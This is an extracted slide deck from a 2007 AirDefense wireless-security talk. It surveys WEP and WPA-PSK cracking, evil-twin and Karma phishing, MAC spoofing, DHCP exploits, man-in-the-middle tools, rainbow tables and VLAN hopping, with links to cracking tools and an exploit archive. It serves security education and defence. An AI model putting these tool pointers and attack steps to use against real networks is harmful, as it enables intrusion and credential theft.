www.airdefense.net war of the airwaves wireless hacks & defenses richard rushing chief security...
TRANSCRIPT
![Page 1: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/1.jpg)
www.airdefense.net
War of the Airwaves Wireless Hacks & Defenses
Richard RushingChief Security Officer
AirDefense, [email protected]
![Page 2: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/2.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Get Ready for the Untethered World!
2
![Page 3: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/3.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wired Network Security Architecture
3
Virus & Malware
Attackers
Data Theft
INTERNET
INTRANET
SECURE ENTERPRISE PERIMETER
Desktop
Server
Inside Threat
![Page 4: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/4.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wireless Threats Enterprise Networks
4
Hacker
INTRANET
INTERNET
Desktop
1 Rogue AP Connected to Network
3 Non-Compliant AP
5 Users Bypassing Network Security Controls
Municipal Wi-Fi
2 Leaked Wired Traffic & Insertion
6 Wi-Fi Phishing
Muni Wi-Fi AP Evil Twin
Laptop
AP
Mobile UserServer
4 Neighboring AP
Municipal Wi-Fi aggravatesThreats to Enterprise Networks
Everyone is on the InsideEveryone is on the Inside
![Page 5: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/5.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Characteristics of Wireless Networks
Shared, Uncontrolled Media Invisible & Airborne Threats are hard to control vs. Wired
Network
Self-Deploying & Transient Networks Simplicity of Self Discovery Create Security Challenges Mobile Nature of Wireless LAN Devices and Users Require
In-depth Forensics capability to Address Security Breaches
AIRVs.
User Indifference Invisible Connectivity & True Distributed Nature Gives a
Faulty Sense of Security
Easier to Attack Lax WLAN Security is the Lowest Hanging Fruit for Hackers.
Dozens of Tools Readily Available to Exploit these Holes
1
2
3
4
Wireless Networks Pose Higher Risks than Wired Networks
5
![Page 6: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/6.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Layered Approach to Security
Wir
ed S
ecu
rity
To
ols
Air
Def
ense
WiredNetworks
WirelessNetworks
Att
ac
k S
op
his
tica
tio
n
Da
ma
ge
PredominantAttacks
IncreasedVulnerability
ForUpper Layers
SSLVPN
Firewalls
Anti Virus
Content Filtering
Secure Perimeter
6
![Page 7: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/7.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wireless Attack Surface
7
Signal emitted from a single access point.
![Page 8: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/8.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Just a Little Wigle
Over 11 Million Networks... With GPS…
I know all your secrets!
Over 11 Million Networks... With GPS…
I know all your secrets!
8
![Page 9: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/9.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Security is Never ABOUT Just Good Enough
9
Security is Never ABOUT JUST GOOD ENOUGH
Run your firewall for 6 minutes a day
Turn off your IDS
Allow All Traffic through your firewall
Leave Doors unlock
Leave Keys in the Car
![Page 10: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/10.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wireless Data Breaches in Retail
10
![Page 11: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/11.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.11
Agenda
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Introduction to Wireless Security
Q&A
Attacking the RF Medium Passive Listening Wired Network Leakage Injection Jamming Breaking WEP
![Page 12: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/12.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wireless Sniffing
Why & What Happens Any clear-text is heard by everyone
If you are using WEP, remember everyone has YOUR key
Very common at hotspots
Hashes are clear-text
Most Service, still authenticate over clear-text no tunnels
Internal/Corporate servers are at higher risk due to lower security
12
![Page 13: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/13.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
It’s Encrypted Is it really encrypted??
In some APs, “Both” is typical security
No to show that data is encrypted
The #1 AP Vendor Enable WEP, MIC, and TKIP
Set the WEP level and enable TKIP and MIC “ If you enter optional, client devices can associate to the access point with or without WEP enabled. You can enable TKIP with WEP set to optional but you cannot enable MIC. If you enter mandatory, client devices must have WEP enabled to associate to the access point. You can enable both TKIP and MIC with WEP set to mandatory.”
www.cisco.com13
![Page 14: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/14.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
WEP Summary of Attacks
23 Known Attacks against WEP WEP Attacks
Lack of IV replay protection Short IV sequence space RC4 vulnerabilities due to WEP’s implementation Linear properties of CRC32 (allows bit flipping) Lack of keyed Message Integrity Checking MIC Use of shared keys
Shows that Implementation is VERY IMPORTANT
Ultimate Hacking tool for Wep
http://www.aircrack-ng.org/
Breaking Wep
2001 Un-crackable
2003 Years
2004 Days
2005 Hours
2006 Minute
2007 Seconds
14
![Page 15: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/15.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
WPA-PSK The PSK version of WPA suffers from an offline dictionary attack because of the
BROADCASTING of information required to create and verify a session key.
In WPA, the PMK (master key) is produced by running a special function on a pre-shared pass phrase and an SSID. Both the host and the AP use this PMK, along with MAC addresses and nonces, in order to create the PTK (session key)
PTK = PRF-512(PMK, “Pairwise key expansion”, Min(AP_Mac, Client_Mac) ||Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
Client Access Point
PMK PMK
Snonce Anonce
EAPOL-Key (Anonce)PTK
PTK
EAPOL-Key (Snonce, MIC RSN IE)
EAPOL-Key (Anonce, MIC RSN IE)Install Keys
Install Keys
EAPOL-Key (Snonce, MIC)
PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
15
![Page 16: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/16.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
WPA Tools (Easier than WEP) http://sourceforge.net/projects/ptcrack/
A hybrid dictionary/brute passphrase search tool for PMK discovery on 802.11 networks using WPA with preshared keys (PSKs)
http://www.churchofwifi.org coWPAtty 3.0 is designed to audit the security of pre-shared keys selected in WiFi Protected
Access (WPA) networks (http://www.churchofwifi.org) Rainbow-Like Tables http://umbra.shmoo.com:6969/torrents/wpa_psk-h1kari_renderman.torrent http://umbra.shmoo.com:6969/torrents/wpa_psk-h1kari_renderman.torrent The resulting list is ~1,000,000 words for a total of approximately 40GB of hash tables for the top 1000
SSID's
AirCrack-NG Built in WPA cracker since version 2.3 http://www.aircrack-ng.org/
http://www.tinypeap.com/page8.html WPA Cracker is a brute force Password cracker, all information entered manually.
Rogue Squadron WRT firmware http://airsnarf.shmoo.com/rogue_squadron/index.html
If you use 21 Character Pass-Phase you are safe? How many clients and AP’s let you enter in 31 Characters? What Happens when you Reach and overlap with SSID?
2006 80 keys per second
2007 130 keys per second
2007 30,000 keys per second
16
![Page 17: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/17.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
What in the Air can Kill You?#1 Corporate Vulnerability Even if the data is encrypted, the services that are
run by the MAC address can be detected
Remember wireless is LAYER 2; it will send out all Layer 2 traffic
VRRP, HSRP, Spanning Tree, OSPF, VTP/VLAN, CDP
VLAN don’t help unless filtered
MOST USE HASHES or PASSWORDS
Clear-Text
Broadcast/Multicast key rotation is OFF by Default
Client devices using static WEP cannot use the access point when you enable broadcast key rotation
It’s a two-way street, what goes out can also come in!
17
![Page 18: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/18.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Injection of Traffic Yersinia is a network tool designed to take advantage of some weaknesses in
different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
http://www.yersinia.net Attacks
Spanning Tree Protocol (STP) Cisco Discovery Protocol (CDP) Dynamic Trunking Protocol (DTP) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) 802.1q 802.1x Inter-Switch Link Protocol (ISL) VLAN Trunking Protocol (VTP)
Current Exploits Cisco CatOS VLAN Trunking Protocol Remote Command Execution Vulnerability
Cisco IOS Multiple VLAN Trunking Protocol Code Execution and DoS Vulnerabilities
Cisco Intrusion Prevention and Detection Systems DoS and Security
Cisco Access Point Web-browser Interface Unauthorized Administrative Access and Bypass Issue
18
![Page 19: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/19.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.19
Agenda
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Introduction to Wireless Security
Q&A
Attacking Clients Wireless Fuzzing Mobile Workers Windows Zero-Configuration Hotspots Station Impersonation Bridging Interfaces Wireless Printers
![Page 20: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/20.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Clients All Shapes and Sizes Hotspots Wi-Fi Phones
Free Access via OUI
Many ways to attack clients Scan Exploit Repeat
But why do you have to? Have the client come to you! YOU KNOW WHAT THEY WANT!!!!!!!
Probe Request
Soft AP to the Probe Request
20
![Page 21: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/21.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Attacking Wireless Clients Packets of Death
Plenty of them from handheld devices to laptops Most are BAD packets Usually Management or Control Frames Some are Data WEP Cracking is adding to the packets
Fuzzing
Most are using cut through data rates (5.5 for Beacon Frames)
Most are simple buffer overflows Lots of things that go BOOM
Client Software Authentication Supplicates
http://www.802.11mercenary.net/lorcon/
21
![Page 22: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/22.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Client MAC Address Spoofing
3. Re-initialize card
MAC: 00 02 2D 50 D1 4E (Cisco 350)
ORIGINAL MAC: 00 12 2D 50 43 1E (Orinoco Gold)
NEW MAC: 00 02 2D 50 D1 4E
12
3
Hacker
User Station
MAC filtering is not enough
2. Change MAC (SMAC, regedit)
1. Find MAC address
4. Associate
www.klcconsulting.net/smac
SMAC is a MAC Address Modifying Utility (spoofer) for Windows 2000/XP and Server 2003 systems, regardless of whether the manufactures allow this option or not.
AP
4
22
![Page 23: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/23.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
How Not to Attack a Client
1
2
3
4
CO
RP
OR
AT
E N
ET
WO
RK
UserStation
AP provides IP address to user
Naïve user Associates with AP
AP responds to Probe request
Laptop sends Probe request
Scan laptop for Windows vulnerabilities & compromise it
5
6Use User Station as a launch pad
IntruderLaptop as
Soft AP
Municipal Wi-Fi increases Evil Twin attack surface
23
Wired Thinking
Attack
![Page 24: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/24.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Windows Wireless Zero Configuration1. Wireless Auto Configuration attempts to
connect to the preferred networks that appear in the list of available networks in the preferred networks preference order
2. If there are no successful connections, Wireless Auto Configuration attempts to connect to the preferred networks that are hidden wireless network. (No Beacon SSID)
24
![Page 25: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/25.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Windows Wireless Zero Configuration3. If there are no successful connections
and there is an ad hoc network in the list of preferred networks that is available, Wireless Auto Configuration tries to connect to it
25
![Page 26: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/26.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Windows Wireless Zero Configuration If there are no successful connections Wireless Auto
Configuration configures the wireless network adapter to act as the first node in the ad hoc network
If there are no successful connections to preferred networks and there are no ad hoc networks in the list of preferred networks, If Automatically connect to non-preferred networks is enabled, If all connection attempts to non-preferred networks fail, Wireless Auto Configuration creates a random wireless network name and places the wireless network adapter in infrastructure mode.
If the Windows wireless client is already connected to a wireless network but a more preferred wireless network becomes available, Wireless Auto Configuration disconnects from the currently connected wireless network and attempts to connect to the more preferred wireless network
26
![Page 27: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/27.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wireless Phishing
Tools such as Karma can respond to ANY client probe request Variety of services (POP, FTP and HTTP) to lure unsuspecting users
No authentication of “pervasive wireless cloud”
Automatic network selection in Windows (Zero Configuration Client) and MACs is dangerous
Enterprises need to manage centralized policies Karma (http://theta44.org/karma/index.html)
AirSnarf (http://airsnarf.shmoo.com/)
27
![Page 28: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/28.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
DHCP and DNS Clients Attacks Since they Take the Hook, now asking for More
Hungry Fish
Give Me an IP Address Give them an address the could be Excluded from Personal Firewalls
10.X.X.X, 192.168.X.X, 172.16.X.X
Or an IP address they are looking for
DHCP Attack Exploit attacks a client and loads creates a Admin User on device
DHCP Broadcast Attack (MS06-036)
http://www.milw0rm.com/sploits/07212006-MS06_036_DHCP_Client.tar.gz
DNS Attack/Manipulation “I am DNS, I am the Internet” - Cricket Liu
Can offer anything to you and you believe it
Sites : Banking, Hotel, Airlines, Work (Exchange, Oracle, SQL)
28
![Page 29: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/29.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Data Seepage Your notebook is not location-aware
Office or Home or Hotspot
Interfaces are Active by order Last Interface is usually Wifi
Wants to always connect to something Just someone to offer you a connection
Office
Home
Hotspot
All data is same
Company Name
Servers
Clients
Applications
And More…..
What am I connected to?
29
![Page 30: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/30.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.30
Agenda
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Introduction to Wireless Security
Q&A
Real-World Wireless Issues Zero-Day Attacks Hotspots
![Page 31: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/31.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Exploiting is too Easy!
Vx.netlux.org MVBSWE Worm Editors Virus Editors Script Editors
Do you Trust your Hotspot Web Page?
Corporate Guest Access?
31
![Page 32: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/32.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Zero Day Alerts
http://www.frsirt.com/
http://www.cert.org
http://nvd.nist.gov
FrSIRT delivers vulnerability and threat alerts, 24/7, 365 days a year, to inform organizations of new potential threats. Our services are designed to deliver notification of vulnerabilities and exploits as they are identified, providing timely, actionable information and guidance to help mitigate risks
before they are exploited.
32
![Page 33: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/33.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
ZERO Day New Attacks
Zero-Day attacks against know services
Zero-Day attacks against IE, Firefox
Remote Exploits
I am on your system as YOU!
New Trojans and Virus ready for Injection
Favorite exploits NEW
WMF
Media Player
Java Exploits
www.milw0rm.com
33
![Page 34: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/34.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Adding to Metasploit Framework
Wireless Enabled Driver Level Exploit
Point and Click Exploits Exploit for Zero-Day
Attacks
Numerous Payloads Number ways to take over
you Computer
34
![Page 35: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/35.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.35
Agenda
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Introduction to Wireless Security
Q&A
Enumeration of Wireless Devices Password Sniffing & Cracking Hacking Password Hashes Breaking VPNs over Wireless Listening to VoIP Conversations One-way Insertion Attacks Zero-day Attacks Snarfing
![Page 36: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/36.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Hacking Password Hashes Get virtually any password Offline & passive LEAP, PPTP, MS-CHAPv2, MD-5 Search hash list to find password Large password list to generate hashes
Requires 3-5 GB of space
Rainbow tables are indexed hash lists Required 2-3 TB of space Known tables exist for up to14 characters http://rainbowtables.shmoo.com/ http://www.antsight.com/zsl/rainbowcrack/ http://www.rainbowcrack-online.com/
36
![Page 37: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/37.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Allows attacker to: Intercept ALL communications between the client & AP
Pretend to be the client without disrupting the client’s session at Layer 2
Possible due to: Management frame’s lack of authentication/ Lack of AP authentication
Step 1: Disassociation of Target station from AP by spoofing the MAC of the AP and sending Disassociate & Deauth Frames
Step 2: Attacker re-associates target to Malicious station and connects to AP
Man-in-the-Middle Attack: WLAN Jack & Air-Jack Tools
TargetServerAP
Dual-Card Attacker
37
![Page 38: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/38.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Snarfing Hot Spots
Security question: Connecting to a untrusted network and launching the most vulnerable program you have just screams
“ E X P L O I T M E “!!!!Fake web pages Steals your Hotspot Password
Evil web pages Infect your PC with Malware
My Web pages Steal your NT Password 1x1 pixel Cross Site Scripting Installs Trojans Installs Spyware Opens back doors Changes Registry Adds User Account Shares Files and such
Oops you just opened a web page, that’s all!!!!!
38
![Page 39: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/39.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Next Generation Wireless Attacks 802.1x State Machine
Client initiated disconnection
Assumes everyone plays nice
Fuzzing Attacks will Expand Intel driver issues 802.1x supplicant issues AP issues
Exploit More EAP-Types TLS is not secure in Windows
Windows Vista Wireless stack rewritten Good news
Support for many EAP types Providing for XP too
Bad news Hacking tools ported to
Windows Built in Network Address
Spoofing Point and click “hacking”
39
![Page 40: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/40.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Firewall Myths
Firewalls: Cannot stop rogue wireless
devices Do not eliminate the need
for wireless scanning for rogues
Do not protect against wireless attacks
Once a hacker is on the network they can punch through open ports
Access Control Lists are weaker than Firewalls
Best bet is to keep hackers off the network
“Firewall only” approach to network security
40
![Page 41: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/41.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
VPN Myths Allows the hacker to get onto open Wi-Fi
network and exploit network or clients for
weaknesses
Client cannot run on many embedded
devices (e.g., wireless scanners, VoWi-Fi
handsets, etc.)
Subnet roaming is problematic
VPN Less performance and more
overhead Break weak encryption & authentication
Re-authentication on weak ciphers Dictionary attacks on weak ciphers
Protocol & server flaws exposed IKE Aggressive mode Pre-shared keys Exploiting bugs in VPN server
Wireless Security
WIPS
VPN
A Layer 3 solution to a Layer 2
problem41
![Page 42: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/42.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
VLANs Virtual Local Area Networks
A logical grouping of devices or users
Users can be grouped by function, department, application,
regardless of physical segment location
VLAN configuration is done at the switch (Layer 2)
WIRELESS is not the SAME (Spoofing is EASY)
VLAN Membership
Static VLAN Assignment Port based membership: Membership is determined by the port on the switch on not by the
host.
Dynamic VLAN Assignment Membership is determined by the host’s MAC address. Administrator has to create a
database with MAC addresses and VLAN mappings
42
![Page 43: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/43.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Guest networking Issues on VLANs Guest access to Internet
via WLAN IP-Adress for WLAN- Client via
DHCP Server which is in the area of the Corporate Network, including DNS Servercredentials
Sometimes a split but that does not help either…. As the DNS Server, still is in the Corporate LAN…
Issues: DHCP DoS DNS DoS VLAN Hopping u.a.
Guest
Internet
DHCP Server
DNSServer
WLAN SSID
= 1q VLAN used for Guest “tunnelt”= 1q VLAN used for Guest “tunnelt”
= DHCP Address supplied containing DNS Server Information
= DHCP Address supplied containing DNS Server Information
= DNS request from Client= DNS request from Client
Access Point
![Page 44: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/44.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
VLAN Hopping
Guest
?
Corp
Guest
WEP Only
VOIPClient
WPA-2
SSID’sCorp
Guest
OLD
VOIP
Basic VLAN Hopping Attack
Attacker fools switch into thinking that he is a switch that needs trunking
Double Encapsulated VLAN Hopping Attack
Switches perform only one level of IEEE 802.1q decapsulation
This allows the attacker to specify a .1q tag inside the frame, allowing the frame to go to a VLAN that the outer tag did specify
OLD
44
![Page 45: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/45.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Why VLAN do not Work for Wireless Making Logical on a Physical Media
Not Making Logical on a Virtual media
Design on Port usage
No Physical Ports on Wireless
45
![Page 46: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/46.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.46
Agenda
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Introduction to Wireless Security
Q&A
